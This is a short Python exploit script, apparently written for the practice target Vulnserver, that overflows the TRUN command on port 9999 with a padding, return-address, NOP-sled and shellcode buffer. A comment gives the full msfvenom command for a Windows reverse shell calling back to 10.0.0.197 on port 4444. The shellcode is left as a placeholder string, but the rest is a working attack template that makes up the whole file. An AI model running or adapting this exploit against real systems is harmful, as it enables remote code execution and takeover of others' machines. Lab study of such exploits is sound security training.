import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

pattern = "A"*2005
return_address = '\xD8\xFC\x91\x7C'
nops = '\x90'*20

# generated by msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp LHOST=10.0.0.197 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' ' -e x86/shikata_ga_nai -i 3 -f py
shellcode=("shellcode")
buffer = pattern + return_address + nops + shellcode
try:
   print "sending attack buffer"
   s.connect(('10.0.2.10', 9999))
   data =s.recv(1024)
   s.send('TRUN . ' + buffer + '\r\n')
   data = s.recv(1024)
except:
   print "Error!"
